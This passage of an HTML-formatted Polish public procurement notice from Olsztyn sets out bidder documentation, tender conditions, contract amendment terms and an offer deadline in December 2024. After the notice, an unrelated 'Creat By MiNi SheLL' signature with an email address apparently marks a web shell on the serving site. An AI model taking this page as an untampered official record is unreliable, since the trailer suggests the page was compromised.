przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, według wzoru na załączniku nr 4 do SWZ, Wykaz winien potwierdzać spełnienie warunków określonych w części VII D ust. 1 pkt 3 SWZ.<br/>1.3.3.	wykazu pojazdów dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie dysponowania tymi pojazdami – wg wzoru na załączniku nr 5 do SWZ. Wykaz winien potwierdzić spełnienie warunków określonych w części VII D ust. 1 pkt. 4 SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, określone zostały w Załączniku nr 6 do SWZ.<br/>2.	Wykonawca składając ofertę oświadcza na formularzu oferty, że akceptuje postanowienia umowy.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454 - 455 Ustawy PZP oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 6 do SWZ. <br/>4.	Zmiana umowy wymaga, pod rygorem nieważności, zachowania formy pisemnej.<br/>5.	Wniesienie zastrzeżeń do treści umowy po zakończeniu postępowania przetargowego będzie traktowane przez Zamawiającego, jako uchylanie się Wykonawcy od zawarcia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com